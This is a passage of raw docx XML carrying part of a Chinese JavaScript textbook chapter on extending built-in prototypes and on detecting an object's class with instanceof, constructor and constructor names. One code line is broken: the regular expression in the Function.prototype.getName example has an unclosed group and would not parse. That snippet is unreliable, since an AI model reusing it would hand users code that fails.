        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!Function.prototype.bind){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.bind=function(o/*,args*/){//bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的代码</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</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这里有一些其他的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>多次调用这个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，传</w:t>
      </w:r>
      <w:r>
        <w:t>入一个迭代数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>要输出</w:t>
      </w:r>
      <w:r>
        <w:t>"hello"</w:t>
      </w:r>
      <w:r>
        <w:t>三次</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//var n=3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//n.times(function(n){console.log(n+"hello");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number.prototype.times=function(f,context){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=Number(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>n;i++)f.call(context,i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>String.trim()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的话，就定义它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法用以去除字符串开头和结尾的空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>String.prototype.trim=String.prototype.trim||function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this)return this;//</w:t>
      </w:r>
      <w:r>
        <w:t>空字符串不做处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.replace(/^\s+|\s+$/g,"");//</w:t>
      </w:r>
      <w:r>
        <w:t>使用正则表达式进行空格替换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回函数的名字，如果它有（非标准的）</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，将函数转换为字符串然后从中提取名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果是没有名字的函数，则返回一个空字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.getName=</w:t>
      </w:r>
      <w:r>
        <w:t>function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.name||this.toString().match(/function\s*([^()*]\(/)[1];</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可以给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加方法，从而使所有的对象都可以调用这些方法。但这种做法并不推荐，因为在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前，无法将这些新增的方法设置为不可枚举的，如果给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加属性，这些属性是可以被</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环遍历到的。在</w:t>
      </w:r>
      <w:r>
        <w:t>9.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中会给出</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个例子，其中使用</w:t>
      </w:r>
      <w:r>
        <w:t>Obje</w:t>
      </w:r>
      <w:r>
        <w:t>ct.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以安全地扩充</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>然而并不是所有的宿主环境（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器）都可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>，这跟</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的具体实现有关。比如，在很多</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中，可以给</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加方法，这样当前文档中表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记的所有对象就可以继承这些方法。但当前版本的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>则不支持这样做。这对客户端编程实用技术有着严重的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="9_5_Lei_He_Lei_Xing_"/>
      <w:r>
        <w:t>9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类和类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章的内容，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了少量的数据类型：</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、布尔值、数字、字符串、函数和对象。</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.13.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）可以得出值的类型。然而，我们往往更希望将类作为类型来对待，这样就可以根据对象所属的类来区分它们。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心中的内置对象（通常是指客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的宿主对象）可以根据它们的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）来区分彼此，比如在例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中用到了</w:t>
      </w:r>
      <w:r>
        <w:t>classof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。但当我们使用本章所提到的技术来定义类的话，实例对象的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性都是</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>，这时</w:t>
      </w:r>
      <w:r>
        <w:t>clas</w:t>
      </w:r>
      <w:r>
        <w:t>sof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数也无用武之地。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来的几节介绍了三种用以检测任意对象的类的技术：</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，以及构造函数的名字。但每种</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>技术都不甚完美，本节总结讨论了鸭式辩型，这种编程哲学更加关注对象可以完成什么工作（它包含什么方法）而不是对象属于哪个类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="9_5_1_instanceofYun_Suan_Fu_"/>
      <w:r>
        <w:t>9.5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节已经讨论过了</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符。左操作数是待检测其类的对象，右操作数是定义类的构造函数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承自</w:t>
      </w:r>
      <w:r>
        <w:t>c.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，则表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o instanceof </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。这里的继承可以不是直接继承，如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>所继承的对象继承自另一个对象，后一个对象继承自</w:t>
      </w:r>
      <w:r>
        <w:t>c.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，这个表达式的运算结果也是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如在本章前面所讲到的，构造函数是类的公共标识，但原型是唯一的标识。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的右操作数是构造函数，但计算过程实际上是检测了对象的继承关系，而不是检测创建对象的构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你想检测对象的原型链上是否存在某个特定的原型对象，有没有不使用构造函数作为中介的方法呢？答案是肯定的，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。比如，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>如下代码来检测对象</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>是否是例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的范围类的成员：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>range.methods.isPrototypeOf(r);//range.method</w:t>
      </w:r>
      <w:r>
        <w:t>是原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符和</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的缺点是，我们无法通过对象来获得类名，只能检测对象是否属于指定的类名。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中还有一个比较严重的不足，就是在多窗口和多框架子页面的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中兼容性不佳。每个窗口和框架子页面都具有单独的执行上下文，每个上下文都包含独有的全局变量和一组构造函数。在两个不同框架页面中</w:t>
      </w:r>
      <w:r>
        <w:t>创建的两个数组继承自两个相同但相互独立的原型对象，其中一个框架页面中的数组不是另一个框架页面的</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的实例，</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="9_5_2_constructorShu_Xing_"/>
      <w:r>
        <w:t>9.5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一种识别对象是否属于某个类的方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。因为构造函数是类的公共标识，所以最直接的方法就是使用</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function typeAndValue(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x==null)return"";//Null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>没有构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(x.constructor){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case Number:return"Number:"+x;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理原始类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case String:return"String:'"+x+"'";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case Date:return"Date:"+x;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理内置类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case RegExp:return"Regexp:"+x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case Complex:return"Complex:"+x;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理自定义类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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需要注意的是，在代码中关键字</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>后的表达式都是函数，如果改用</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符或获取到</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，它们应当改为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性检测对象属于某个类的技术的不足之处和</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>一样。在多个执行上下文的场景中它是无法正常工作的（比如在浏览器窗口的多个框架子页面中）。在这种情况下，每个框架页面各自拥有独立的构造函数集合，一个框架页面中的</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数和另一个框架页面的</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数不是同一个构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中也并非所有的对象都包含</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在每个新创建的函数原型上默认会有</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但我</w:t>
      </w:r>
      <w:r>
        <w:t>们常常会忽觉原型上的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。比如本章前面的示例代码中所定义的两个类（在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中），它们的实例都没有</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="9_5_3_Gou_Zao_Han_Shu_De_Ming_Cheng_"/>
      <w:r>
        <w:t>9.5.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数的名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符和</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性来检测对象所属的类有一个主要的问题，在多个执行上下文中存在构造函数的多个副</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本的时候，这两种方法的检测结果会出错。多个执行上下文中的函数看起来是一模一样的，但它们是相互独立的对象，因此彼此也不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一种可能的解决方案是使用构造函数的名字而不是构造函数本身作为类标识符</w:t>
      </w:r>
      <w:r>
        <w:t>。一个窗口里的</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数和另一个窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数是不相等的，但是它们的名字是一样的。在一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现中为函数对象提供了一个非标准的属性</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>，用来表示函数的名称。对于那些没有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现来说，可以将函数转换为字符串，然后从中提取出函数名（在</w:t>
      </w:r>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中的示例代码给</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>类添加了</w:t>
      </w:r>
      <w:r>
        <w:t>getName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就是使用这种方式来得到函数名）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-4</w:t>
      </w:r>
      <w:r>
        <w:t>定义的</w:t>
      </w:r>
      <w:r>
        <w:t>type()</w:t>
      </w:r>
      <w:r>
        <w:t>函数以字符串的形式返回对象的类型。它用</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来处理原始值和函数。对于对</w:t>
      </w:r>
      <w:r>
        <w:t>象来说，它要么返回</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值要么返回构造函数的名字。</w:t>
      </w:r>
      <w:r>
        <w:t>type()</w:t>
      </w:r>
      <w:r>
        <w:t>函数用到了例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>classof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中的</w:t>
      </w:r>
      <w:r>
        <w:t>Function.getName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。为了简单起见，这里包含了函数和方法的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-4</w:t>
      </w:r>
      <w:r>
        <w:t>：可以判断值的类型的</w:t>
      </w:r>
      <w:r>
        <w:t>type()</w:t>
      </w:r>
